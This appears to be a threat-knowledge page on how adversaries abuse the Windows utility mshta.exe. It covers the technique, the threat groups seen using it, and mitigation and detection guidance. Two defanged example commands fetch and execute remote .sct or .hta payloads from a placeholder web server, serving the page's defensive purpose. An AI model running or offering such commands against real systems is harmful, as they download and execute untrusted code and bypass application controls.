Signed Binary Proxy Execution: Mshta
Other sub-techniques of Signed Binary Proxy Execution (11)
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code [1] [2] [3] [4] [5]
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. [6] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. [7]
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. [8]
Procedure Examples
Name | Description |
---|---|
APT32 | |
FIN7 |
FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.[5] |
Inception |
Inception has used malicious HTA files to drop and execute malware.[11] |
Kimsuky |
Kimsuky has used mshta to run malicious scripts on the system.[12] |
Koadic | |
Lazarus Group |
Lazarus Group has used mshta.exe to run malicious scripts and download programs.[14] |
Metamorfo | |
MuddyWater |
MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[16][17] |
NanHaiShu | |
POWERSTATS |
POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.[16] |
Revenge RAT |
Revenge RAT uses mshta.exe to run malicious scripts on the system.[19] |
Xbash |
Mitigations
Mitigation | Description |
---|---|
Disable or Remove Feature or Program |
Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life. |
Execution Prevention |
Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries. |
Detection
Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious
References
- Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.
- McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.
- Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.
- Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.
- Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
- Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.
- Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.
- LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.
- Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
- GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
- Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.
- Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
- F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020.
- Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.
- Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
- F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018.
- Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019.
- Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.